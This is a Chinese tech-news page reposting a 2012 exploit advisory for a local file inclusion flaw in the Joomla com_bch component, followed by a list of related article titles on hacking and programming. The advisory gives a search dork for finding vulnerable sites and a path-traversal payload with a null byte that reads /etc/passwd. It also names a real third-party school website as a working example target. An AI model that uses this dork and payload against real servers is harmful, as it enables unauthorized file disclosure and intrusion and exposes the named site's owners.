当前位置: 首页 > news >正文

Joomla Component com_bch LFI Vulnerability

news 来源:原创 2024/5/19 6:45:36

很多CMS用的这个。很给力的

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

 
  1. [ Joomla Component com_bch LFI Vulnerability ]

  2.  

  3. [x] Author : the_cyber_nuxbie

  4. [x] Home   : www.thecybernuxbie.com

  5. [x] E-mail : staff@thecybernuxbie.com

  6. [x] Found  : 24 January 2012.

  7. [x] Tested : Windows 7 Ultimate.

  8. [x] Dork   : inurl:"/index.php?option=com_bch"

  9. ________________________________________________________________

  10. ****************************************************************

  11.  

  12. [x] Vuln Exploit Report:

  13. http://localhost/index.php?option=com_bch&controller=[LFI]

  14.  

  15. - Example Website Vuln:

  16. http://trunghocvungtauhaingoai.com/index.php?option=com_bch&controller=../../../../../../../../../../../../../etc/passwd%00

  17.  

  18. [x] N0T35:

  19. 0day no more...

  20. "n0 d0rk f0r k1dd10ts"

  21.  

  22. - Thanks To All Exploiters From Indonesian:

  23. Akatsuchi, AntiSecurity, Arianom, bius, blackraptor, bumble_be, c4uR, cr4wl3r, cyberlog, Don Tukulesto,

  24. EA Ngel, eidelweiss, Flyff666, Gendenk, gunslinger_, h4ntu, h010ng, IbnuSina, irvian, Jack, k1ngk0n9, k1tk4t, k4mtiez,

  25. K-159, kecemplungkalen, M3NW5, Mbah_Semar, mywisdom, NoGe, NTOS-Team, Oli Bekas, OoN_Boy, Pokeng, S3T4N, s4va,

  26. skulmatic, spykit, Sudden_death, team_elite, tempe_mendoan, the_day, tomplixsee, vanzay, v3n0m, vir0e5, Vrs-hCk, vYc0d,

  27. Xr0b0t, y3d1ps, Z190T, etc... 

  28.  

  29. - Nuxploits Security Project:

  30. [ www.thecybernuxbie.com ] <-- Learn Hack with Us...!!!

  31.  

  32. January, 24 2012, GMT +07:36 Solo Raya, Indonesia.

相关文章:

  • IIS“页面无法显示”的故障及其解决方法
  • Linux服务器安全配置
  • sqlmap使用文档
  • MSSQL2008一句话启用xp_cmdshell
  • web脆弱性评估漏洞利用
  • Web Application Firewall Bypasses and PHP Exploit
  • 利用Acunetix WVS进行批量网站漏洞评估
  • F4ck Fckeditor 的精简总结
  • 渗透技巧笔记 - 落泪红尘
  • webshell下查找所有IIS站点配置(渗透时可能有点用)
  • udf手动导出提权
  • 远程包含
  • 命令行下的嗅探工具 - RawSniffer 1.2
  • linux下给目录下所有子目录和文件赋权
  • discuz X2 0day
  • cookie和session
  • css选择器
  • Flex布局到底解决了什么问题
  • JavaScript 一些 DOM 的知识点
  • JavaScript设计模式与开发实践系列之策略模式
  • js对象的深浅拷贝
  • SpiderData 2019年2月16日 DApp数据排行榜
  • 从tcpdump抓包看TCP/IP协议
  • 从零到一:用Phaser.js写意地开发小游戏(Chapter 3 - 加载游戏资源)
  • 从伪并行的 Python 多线程说起
  • 短视频宝贝=慢?阿里巴巴工程师这样秒开短视频
  • 汉诺塔算法
  • 基于MaxCompute打造轻盈的人人车移动端数据平台
  • 理清楚Vue的结构
  • 如何设计一个比特币钱包服务
  • 通过来模仿稀土掘金个人页面的布局来学习使用CoordinatorLayout
  • Mac 上flink的安装与启动
  • Semaphore
  • zabbix3.2监控linux磁盘IO
  • #FPGA(基础知识)
  • $(document).ready(function(){}), $().ready(function(){})和$(function(){})三者区别
  • $.extend({},旧的,新的);合并对象,后面的覆盖前面的
  • (JSP)EL——优化登录界面,获取对象,获取数据
  • (动态规划)5. 最长回文子串 java解决
  • (附源码)spring boot北京冬奥会志愿者报名系统 毕业设计 150947
  • (附源码)springboot 个人网页的网站 毕业设计031623
  • (使用vite搭建vue3项目(vite + vue3 + vue router + pinia + element plus))
  • (原)Matlab的svmtrain和svmclassify
  • (转)iOS字体
  • (转)shell中括号的特殊用法 linux if多条件判断
  • (转)可以带来幸福的一本书
  • ./configure,make,make install的作用
  • ./mysql.server: 没有那个文件或目录_Linux下安装MySQL出现“ls: /var/lib/mysql/*.pid: 没有那个文件或目录”...
  • .Net Attribute详解(上)-Attribute本质以及一个简单示例
  • .net core 6 redis操作类
  • .Net CoreRabbitMQ消息存储可靠机制
  • .NET 中让 Task 支持带超时的异步等待
  • .Net环境下的缓存技术介绍
  • .NET与java的MVC模式(2):struts2核心工作流程与原理
  • /bin、/sbin、/usr/bin、/usr/sbin